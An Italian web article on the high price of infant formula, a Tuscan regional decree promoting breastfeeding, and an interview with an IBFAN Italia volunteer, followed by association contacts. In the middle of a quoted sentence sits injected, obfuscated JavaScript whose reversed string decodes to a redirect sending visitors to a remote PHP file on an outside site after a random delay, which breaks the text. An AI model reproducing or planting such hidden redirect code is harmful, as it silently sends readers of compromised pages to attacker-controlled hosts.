Niente spaccio in maternità

image_pdfimage_print

Il latte artificiale in Italia costa quasi quattro volte di più che nel resto d’Europa. Anche il Ministro della Salute Girolamo Sirchia se n’è finalmente accorto e, per correre ai ripari, ha recentemente incontrato le aziende produttrici, i farmacisti e i pediatri al fine di raggiungere un’intesa volta al ribasso dei prezzi.
Diversa la strategia della Regione Toscana, che con un’apposita delibera si è impegnata a sostenere l’esperienza unica dell’allattamento al seno, considerato a livello internazionale uno dei principali indicatori di valutazione dello stato di salute di una popolazione.
Ne abbiamo parlato con Paola Negri, mamma di tre bambini, volontaria a tempo pieno presso IBFAN ITALIA (International Baby Food Action Network) e consulente professionale in allattamento al seno. L’occasione nasce da un incontro promosso presso il punto Soci della Coop di Ponte a Greve dall’Associazione Culturale “Insieme Allattiamo”, di cui Paola fa parte.
Ci chiediamo: ma come, non lo sanno già tutti che non c’è nulla di meglio del latte della mamma? “Purtroppo non è così; la strada da fare per cambiare ‘la cultura del biberon’ è ancora lunga – ci dice Paola – soprattutto qu (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando si ha a che fare con multinazionali così potenti da arrivare a distribuire e commercializzare i loro prodotti direttamente nelle strutture sanitarie spesso con il benestare del personale medico-sanitario…”
In ospedale accade questo? “Sono molte le mamme che possono confermare la scorrettezza di questi comportamenti – racconta ancora Paola – ma è molto difficile andare oltre la semplice testimonianza.”
La situazione è complessa e coinvolge, oltre alle multinazionali, il personale medico sanitario che, promuovendo una marca di latte piuttosto che un’altra, si garantisce diversi vantaggi, come per esempio partecipare, magari in splendide località di vacanza, ad eventi formativi organizzati proprio dalle stesse aziende che producono o commercializzano i prodotti sostitutivi del latte materno.
Per questo da noi il latte artificiale costa così tanto. Ma ridurre i prezzi è sufficiente? “No, certo. Occorre muoversi su tre fronti: la promozione dell’allattamento, la protezione e il sostegno diretto alle mamme.”
Ed è quello che intende fare la Regione con l’approvazione della recente delibera che, tra le varie determinazioni, sancisce il divieto di distribuzione gratuita dei sostituti del latte materno, come di tutti gli alimenti e le bevande riconducibili all’alimentazione del neonato, presso i presidi ospedalieri ed ambulatoriali della Toscana.
Secondo Paola, però, bisogna lavorare ancora molto sul sostegno psicologico da dare alla mamma che, dopo il parto, si trova in una situazione di forte stanchezza fisica ed emotiva. Alle problematiche legate all’allattamento non è dedicato spazio neppure all’interno del percorso di studi del personale medico-sanitario: da ciò deriva che, alla prima difficoltà, invece di capire il tipo di problema, si preferisce consigliare l’alimentazione artificiale. “Sono pochissimi i casi – conclude Paola – in cui è necessario dare qualcos’altro rispetto al latte materno e raramente le madri non hanno latte a sufficienza”.
La maggior parte degli errori è determinata dalla mancanza di tempo e di informazioni appropriate; per questo è di fondamentale importanza non sottovalutare nessun aspetto, informandosi già durante la gravidanza.

Per saperne di più:
Insieme allattiamo ­ Ass. Culturale
Via delle Fonti, 37 – 50010 San Martino alla Palma (FI) insiemeallattiamo@libero.it
Elise Chapin ­ 329/4947279, Paola Negri ­ 055/827494, Simona Rinaldi ­ 335/5723127
IBFAN Italia – International Baby Food Action Network
Via Treggiaia, 11 ­ 50020 Romola ­ Firenze
www.ibfanitalia.org
La Leche League Italia
Via Assisi, 20 – Firenze ­ 055/781737
Rete Italiana Boicottaggio Nestlè
http://www.ribn.it
www.consumatorionline.net

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *